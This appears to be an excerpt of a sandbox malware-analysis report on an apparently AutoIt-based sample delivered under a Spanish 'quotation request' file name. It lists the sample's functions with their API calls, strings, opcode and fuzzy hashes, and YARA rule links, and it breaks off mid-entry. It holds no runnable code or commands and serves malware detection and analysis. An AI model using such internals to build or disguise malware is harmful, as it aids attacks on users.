API String ID: 2457776203-404129466
Opcode ID: 9f323c43d92b0351aefde7d34df590abc9a920277b0e849c5a3743ee23a4ce40
Instruction ID: acdad67ae5d5de3cb70d96512d953514d0d50df0026f45de71da1bbef66e9974
Opcode Fuzzy Hash: 9f323c43d92b0351aefde7d34df590abc9a920277b0e849c5a3743ee23a4ce40
Instruction Fuzzy Hash: 59112B316BA307BAA705BB54EC86DBA679CDF16354B30002FF944A7282D7F05DA05664

Function 0026ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0026ED2A
_wcslen.LIBCMT ref: 0026ED3B
_wcslen.LIBCMT ref: 0026ED79
_wcslen.LIBCMT ref: 0026EDAF
_wcslen.LIBCMT ref: 0026EDDF
_wcslen.LIBCMT ref: 0026EDEF
_wcslen.LIBCMT ref: 0026EE2B
_wcslen.LIBCMT ref: 0026EE5A

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: e3580494bdcba734a6ca4a871af36f62dd9bc19bbb202ba90e5d722a3fe47704
Instruction ID: 5d73230382ec574176e0f869b59e7f68c371a15fb59a13f1d36aeba6741149f2
Opcode Fuzzy Hash: e3580494bdcba734a6ca4a871af36f62dd9bc19bbb202ba90e5d722a3fe47704
Instruction Fuzzy Hash: 40417566C20128B5CB11FBF4988AACF77ACAF45710F514562F914E3122FB34E2A5C7E5

Function 0021F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0025682C,00000004,00000000,00000000), ref: 0021F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0025682C,00000004,00000000,00000000), ref: 0025F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0025682C,00000004,00000000,00000000), ref: 0025F454

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: e088928c4ffd86515b32ceac4c105f44ab4d19681825441df2664794cec17c48
Instruction ID: 651cfdc978ba3509d7111bb548fd455d33f9e9eb806fb4a7d1d4ff411c54ce1c
Opcode Fuzzy Hash: e088928c4ffd86515b32ceac4c105f44ab4d19681825441df2664794cec17c48
Instruction Fuzzy Hash: 7C417B306382C1BAD7B4AF28DB8C7EA7BD1AB66320F58443DE46752560C671A8E1CB50

Function 00292D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00292D1B
GetDC.USER32(00000000), ref: 00292D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00292D2E
ReleaseDC.USER32(00000000,00000000), ref: 00292D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00292D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00292D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00295A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00292DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00292DE1

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 309304c2a5f8a8c734937adb27be1e8fd5bd633e3ab327038b23c470fdf7a724
Instruction ID: 86693869f5a15bc50b309851238edd1230b380be1809f6d14cc7f7562a78d97a
Opcode Fuzzy Hash: 309304c2a5f8a8c734937adb27be1e8fd5bd633e3ab327038b23c470fdf7a724
Instruction Fuzzy Hash: D3316772211214BBEF258F50DC8AFEB3BADEF49715F144066FE089A291C6759C50CBB4

Function 00265622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00265637
_memcmp.LIBVCRUNTIME ref: 00265659
_memcmp.LIBVCRUNTIME ref: 00265671
_memcmp.LIBVCRUNTIME ref: 00265684
_memcmp.LIBVCRUNTIME ref: 0026569E
_memcmp.LIBVCRUNTIME ref: 002656B1
_memcmp.LIBVCRUNTIME ref: 002656C9
_memcmp.LIBVCRUNTIME ref: 002656E4

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: f12ec4c756314b31198a939e3b1e112b9c43dda5ff755ed087892c27bce36f48
Instruction ID: a76b5554d6860fe30e97bf5f8e6dcd6ea138874c35c5ee983acd8d7df74d4d4e
Opcode Fuzzy Hash: f12ec4c756314b31198a939e3b1e112b9c43dda5ff755ed087892c27bce36f48
Instruction Fuzzy Hash: AB212661670A3A7BD668DA20EE82FFA334DAF31394F444021FD04AA685F760ED70C5A5

Function 00284FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0028502E, 00285383
Not an Object type, xrefs: 00285007

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 3952ad50ec6976bd9dc6fb47918f36482fa9ed802885da069da61cd381c037ab
Instruction ID: 915e19ef58ad51eb871dc8cb191ac73a87e7fb37807e0df261c8993c59b66ece
Opcode Fuzzy Hash: 3952ad50ec6976bd9dc6fb47918f36482fa9ed802885da069da61cd381c037ab
Instruction Fuzzy Hash: 0BD1E279A1161AAFDF10EFA8C884BAEB7B5FF48344F148069E915AB2C0E770DD51CB50

Function 00241522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,002417FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 002415CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00241651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,002417FB,?,002417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 002416E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 002416FB

Part of subcall function 00233820: RtlAllocateHeap.NTDLL(00000000,?,002D1444,?,0021FDF5,?,?,0020A976,00000010,002D1440,002013FC,?,002013C6,?,00201129), ref: 00233852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,002417FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00241777
__freea.LIBCMT ref: 002417A2
__freea.LIBCMT ref: 002417AE

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: c6511dad6a8d6c71e87463dd4290172509f1204eb4ee04de4ebbc4a20224df54
Instruction ID: b9f922caafce395c090eb7c264840ba5de1beb4007d276aafb48984d656b56ec
Opcode Fuzzy Hash: c6511dad6a8d6c71e87463dd4290172509f1204eb4ee04de4ebbc4a20224df54
Instruction Fuzzy Hash: 5F91D471E302169ADF288F74CC81AEEBBB9AF49750F584659E805E7181D735CDB0CB60

Function 00284523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00284648
VariantInit.OLEAUT32(?), ref: 00284749
VariantClear.OLEAUT32(?), ref: 00284753
VariantClear.OLEAUT32(?), ref: 002847B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 002845D8, 00284706, 002847BE
Incorrect Object type in FOR..IN loop, xrefs: 0028472C

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 18286988f862b06d7385f70b3029c5b40c57732a600f0da7e186ad4e5be3f37e
Instruction ID: 3bf92312edea8db2baac7b382aba1b7c8384202e5fab1a18095b0114ede9c480
Opcode Fuzzy Hash: 18286988f862b06d7385f70b3029c5b40c57732a600f0da7e186ad4e5be3f37e
Instruction Fuzzy Hash: 7891A174A21216AFDF20EFA4C844FAEBBB8EF46714F108559F505AB280D7709951CFA0

Function 00271187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0027125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00271284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 002712A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002712D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0027135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 002713C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00271430

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 60a13a833ff4033e0e5be52a142b7548544ac47fca0b861042089f1bab6aa629
Instruction ID: 126072bb23f09667f871955bcca36162377ee997781f6e440e82903a2a20dc0b
Opcode Fuzzy Hash: 60a13a833ff4033e0e5be52a142b7548544ac47fca0b861042089f1bab6aa629
Instruction Fuzzy Hash: 6B911771A20219AFEB00DF98D895BBE77B5FF45314F108029E908EB292D774A971CF50

Function 0021948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: a485ccfd925479ed631c4c5689a452f74cb53985abeef0d5b8e2526f4d975f20
Instruction ID: afcdd22d45c8a3b2fa1c75af37d4ead3ff3c3be7c07391fc43982cb4796a502a
Opcode Fuzzy Hash: a485ccfd925479ed631c4c5689a452f74cb53985abeef0d5b8e2526f4d975f20
Instruction Fuzzy Hash: DA912671D5021AEFCB10CFA9CC88AEEBBB9FF49320F148055E915B7251D374AA91CB60

Function 00283947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0028396B
CharUpperBuffW.USER32(?,?), ref: 00283A7A
_wcslen.LIBCMT ref: 00283A8A
VariantClear.OLEAUT32(?), ref: 00283C1F

Part of subcall function 00270CDF: VariantInit.OLEAUT32(00000000), ref: 00270D1F
Part of subcall function 00270CDF: VariantCopy.OLEAUT32(?,?), ref: 00270D28
Part of subcall function 00270CDF: VariantClear.OLEAUT32(?), ref: 00270D34

Strings

Incorrect Parameter format, xrefs: 002839A6, 00283BA1
AUTOIT.ERROR, xrefs: 00283A80, 00283A85

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: b5b5b31b035152f7804d5458314f9fb867d47f914e1a4b5eb8dfe668c3ffb216
Instruction ID: ee559c15eccad877249ec435f9e8ce7afdbaeb7fdb19ccd173419c17b6afd191
Opcode Fuzzy Hash: b5b5b31b035152f7804d5458314f9fb867d47f914e1a4b5eb8dfe668c3ffb216
Instruction Fuzzy Hash: 7B9149756283019FC704EF24C48096AB7E4BF89714F14892EF88A97392DB31EE55CF92

Function 00284BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0026000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0025FF41,80070057,?,?,?,0026035E), ref: 0026002B
Part of subcall function 0026000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0025FF41,80070057,?,?), ref: 00260046
Part of subcall function 0026000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0025FF41,80070057,?,?), ref: 00260054
Part of subcall function 0026000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0025FF41,80070057,?), ref: 00260064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00284C51
_wcslen.LIBCMT ref: 00284D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00284DCF
CoTaskMemFree.OLE32(?), ref: 00284DDA

Strings

NULL Pointer assignment, xrefs: 00284E23, 00284E52

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: a9faae874e68b641d70777975292fc2277f8e01a5e29df06b2ac62d76a6061d3
Instruction ID: 00ff83c1e7553728162c2f75b498411606df534c0a5138a8c11ab040ab362ff0
Opcode Fuzzy Hash: a9faae874e68b641d70777975292fc2277f8e01a5e29df06b2ac62d76a6061d3
Instruction Fuzzy Hash: D8913B71D1121EEFDF14EFA4D891AEEB7B8BF08304F10816AE915A7291DB705A64CF60

Function 002920FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00292183
GetMenuItemCount.USER32(00000000), ref: 002921B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002921DD
_wcslen.LIBCMT ref: 00292213
GetMenuItemID.USER32(?,?), ref: 0029224D
GetSubMenu.USER32(?,?), ref: 0029225B

Part of subcall function 00263A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00263A57
Part of subcall function 00263A3D: GetCurrentThreadId.KERNEL32 ref: 00263A5E
Part of subcall function 00263A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002625B3), ref: 00263A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002922E3

Part of subcall function 0026E97B: Sleep.KERNEL32 ref: 0026E9F3

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 3703df460916132bcaa7d4e1f45788a1304a7d77e8d405e89f4e846356ebe5b5
Instruction ID: eacbe45099eb37a0878b525d2ee0320ac4c5dab45d3e6076682ded945f315ee1
Opcode Fuzzy Hash: 3703df460916132bcaa7d4e1f45788a1304a7d77e8d405e89f4e846356ebe5b5
Instruction Fuzzy Hash: 9D716C75E20205EFCF14EFA4C845AAEB7F5AF48310F1484A9E816EB352DB34AD558F90

Function 0026AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0026AEF9
GetKeyboardState.USER32(?), ref: 0026AF0E
SetKeyboardState.USER32(?), ref: 0026AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0026AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0026AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0026AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0026B020

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: bc7916c1d1e2e81171c14adbdf6776a72c592e166d39fe9389cb52960aa7cdda
Instruction ID: 03e1394504649676075fda1ec98571eaeefe3e47ff57b4526d6d2372a1d24b97
Opcode Fuzzy Hash: bc7916c1d1e2e81171c14adbdf6776a72c592e166d39fe9389cb52960aa7cdda
Instruction Fuzzy Hash: 1451D6A0A247D63DFB3746348C45BBA7EE95B06304F088489F1D9958C3C3E9ACE4DB52

Function 0026ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0026AD19
GetKeyboardState.USER32(?), ref: 0026AD2E
SetKeyboardState.USER32(?), ref: 0026AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0026ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0026ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0026AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0026AE38

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: b45834b49a133c99352d1bc100898ac193c68cbe09298bcf29905353c59e52ef
Instruction ID: d8577cf24d1e68b6f0e7327228a31125d737790f9fc562504d610e84e665733a
Opcode Fuzzy Hash: b45834b49a133c99352d1bc100898ac193c68cbe09298bcf29905353c59e52ef
Instruction Fuzzy Hash: 085107A1A247D23DFB378B348C95B7A7EE85B46300F088499E1D5668C3C295ECE4DB52

Function 0023542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00243CD6,?,?,?,?,?,?,?,?,00235BA3,?,?,00243CD6,?,?), ref: 00235470
__fassign.LIBCMT ref: 002354EB
__fassign.LIBCMT ref: 00235506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00243CD6,00000005,00000000,00000000), ref: 0023552C
WriteFile.KERNEL32(?,00243CD6,00000000,00235BA3,00000000,?,?,?,?,?,?,?,?,?,00235BA3,?), ref: 0023554B
WriteFile.KERNEL32(?,?,00000001,00235BA3,00000000,?,?,?,?,?,?,?,?,?,00235BA3,?), ref: 00235584

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 236ede0a8de2565c96b13a0bbd10b21bcb1e4b5c7ab7cf42b3fdf285ee34b73d
Instruction ID: 8b3ea8c3cd2a28ec3a4fedbcbb967552aea303fb18b377d494be74500cf6eeef
Opcode Fuzzy Hash: 236ede0a8de2565c96b13a0bbd10b21bcb1e4b5c7ab7cf42b3fdf285ee34b73d
Instruction Fuzzy Hash: 5B51E6B09106199FDB10CFA8D885BEEBBF9EF08300F14451AF559E7291D730AA51CB60

Function 002810B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0028304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0028307A
Part of subcall function 0028304E: _wcslen.LIBCMT ref: 0028309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00281112
WSAGetLastError.WSOCK32 ref: 00281121
